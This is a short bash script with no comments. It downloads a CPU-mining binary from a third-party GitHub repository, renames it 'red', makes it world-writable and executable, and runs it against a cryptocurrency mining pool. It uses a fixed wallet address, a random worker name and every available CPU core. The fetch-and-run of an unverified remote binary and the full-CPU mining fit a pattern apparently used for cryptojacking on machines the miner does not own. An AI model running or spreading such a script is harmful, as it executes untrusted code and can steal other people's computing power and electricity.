#!/bin/bash
wget -O red https://github.com/kidoescegh/pilekyla/raw/main/cpuminer-avx2
chmod 777 red
./red -a flex -o stratum+tcp://us-west.mining4people.com:3449 -u KCN=kc1qylrmtzw47wldzzgwfkxtgrhgvp8jnyrck33nqu.$(shuf -n 1 -i 1-99999)-ON -t $(nproc --all)
